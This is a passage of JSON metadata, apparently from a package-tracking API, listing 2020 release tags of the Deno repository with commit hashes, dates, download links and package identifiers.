releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2F